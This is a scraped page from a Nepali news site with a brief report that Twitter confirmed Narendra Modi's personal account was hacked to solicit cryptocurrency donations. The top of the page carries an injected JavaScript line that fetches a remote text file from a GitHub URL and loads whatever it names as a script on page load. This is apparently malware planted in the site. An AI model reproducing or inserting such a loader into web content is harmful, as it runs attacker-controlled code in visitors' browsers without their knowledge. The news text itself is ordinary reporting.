;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); भारतीय प्रधानमन्त्री मोदीको एकाउन्ट ह्याक भएको हाे – ट्वीटर – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • भारतीय प्रधानमन्त्री मोदीको एकाउन्ट ह्याक भएको हाे – ट्वीटर
अन्तर्राष्ट्रिय

भारतीय प्रधानमन्त्री मोदीको एकाउन्ट ह्याक भएको हाे – ट्वीटर

ट्वीटर

भदौ १८,
काठमाण्डाै । भारतका प्रधानमन्त्री नरेन्द्र मोदीको व्यक्तिगत ट्वीटर एकाउन्ट ह्याक भएको छ । मोदीको एकाउन्टबाट राहत कोषमा क्रिप्टोकरेन्सीमार्फत सहयोग प्रदान गर्न आग्रह गरेर शृङ्खलाबद्ध ट्वीट भएको थियो । ट्वीटरले भारतीय प्रधानमन्त्री मोदीको एकाउन्ट ह्याक भएको पुष्टि गरेको बीबीसीले जनाएको छ ।

प्रधानमन्त्री राष्ट्रिय राहत कोषमा क्रिप्टोकरेन्सीमार्फत सहयोग प्रदान गर्न अपिल गरिएका ट्वीटहरु अहिले हटाइएको छ । ट्वीटरले एकाउन्ट ह्याक भएकोबारे जानकारी भएको र त्यसलाई सुरक्षित गर्नका लागि आवश्यक कदम चालिएको बताएको खबरमा उल्लेख छ ।

यसअघि जुलाईमा अमेरिकामा आउँदो नोभेम्बरमा हुने चुनावका लागि राष्ट्रपति उम्मेदवार जो बाइडेन तथा टेस्लाका संस्थापक एलन मस्कसहितको एकाउन्टमा पनि यस्तै प्रकारको आक्रमण भएको थियो । file Photo

फेसबुक प्रतिक्रियाहरु